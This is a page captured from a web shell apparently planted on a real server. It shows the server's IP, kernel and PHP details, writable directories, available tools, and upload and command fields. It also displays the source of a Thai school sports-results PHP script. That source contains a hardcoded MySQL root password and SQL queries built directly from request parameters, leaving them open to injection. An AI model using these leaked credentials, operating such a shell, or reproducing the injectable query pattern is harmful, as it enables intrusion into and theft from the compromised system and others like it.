403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/sport/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa/sport/sumtotal.php
<script language="javascript">  
function chk_all(){  
    var x=document.getElementsByTagName("input");  
    for(i=0;i<=x.length;i++){  
        if(x[i].type=="checkbox"){  
            x[i].checked=true; 
			}}}
			function unchk_all(){  
    var x=document.getElementsByTagName("input");  
    for(i=0;i<=x.length;i++){  
        if(x[i].type=="checkbox"){  
            x[i].checked=false;  
        }  
    }  
}  
			</script>
<form name="form1" method="POST" action=""> 
  <?php
  require_once "../head.php";
$objConnect = mysql_connect("localhost","root","klw3322") or die("Error Connect to Database");
$objDB = mysql_select_db("klw");
mysql_query("set NAMES tis620");

$strSQL = "SELECT * FROM sportinstall where score='$_GET[id]' group by cl";
$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");

?>
  </p>
  <table width="730" border="1">
  <tr>
     <th > <div align="center"><a href="javascript:chk_all();">เลือกทั้งหมด</a>/<a href="javascript:unchk_all();">ไม่เลือกทั้งหมด </a></div></th> 
	 <th width="190"> <div align="center">สี</div></th>
    <th width="190"> <div align="center">ประเภท</div></th>
    
  </tr>

<?php
while($objResult = mysql_fetch_array($objQuery))
{
	$sportname=$objResult["score"];
?>

  <tr>
    <td align="center"><input name="FilesID[]" type="checkbox" value="<?php echo $objResult["FilesID"];?>"   >
    </td> 
	<td><input name="Name_C[]" type="hidden" value="<?php echo $objResult["cl"];?>" ><?php echo $objResult["cl"];?></td>
    <td><input name="Name_T[]" type="hidden" value="<?php echo $objResult["score"];?>" ><?php echo $objResult["score"];?>
	
	<?       $crsql="SELECT ( sportname ) FROM `sporttyp`
					WHERE id = '$sportname'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$cheke=$dcrd[0];
	             ?>
	
	<? echo "$cheke"; ?>
	</td>
   
  </tr>
<?
	 
  }
  ?>
</table>
<p>
  <input type="submit" name="button" id="button" value="บันทึกข้อมูลที่เลือก" >
</p>
</form>

เตรียมประกาศผล
<?php
if($_POST[button]==""){
exit();
}

for($i=0;$i< count($_POST[FilesID]);$i++){
	 $fid=$_POST[FilesID][$i];
	 $fname= $_POST[Name_C][$i];
	$t= $_POST[Name_T][$i];
	$score= $_POST[m][$i];
	// insert tb2
	$sqlinsert="INSERT INTO  sportpost  (clpost,typ_post,post)  values ('$fname','$t','$score')";
	$objQuery = mysql_query($sqlinsert) or die ("Error Query [".$sqlinsert."]");
	echo "<script>window.alert(\"Save ok\");history.go (-1);</script>";
	//delete from tb 1
	//$sqldelete="Delete  from   tb1   where  FilesID='$fid'  ";
	//$objQuery = mysql_query($sqldelete) or die ("Error Query [".$sqldelete."]");
	//echo "<br>";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit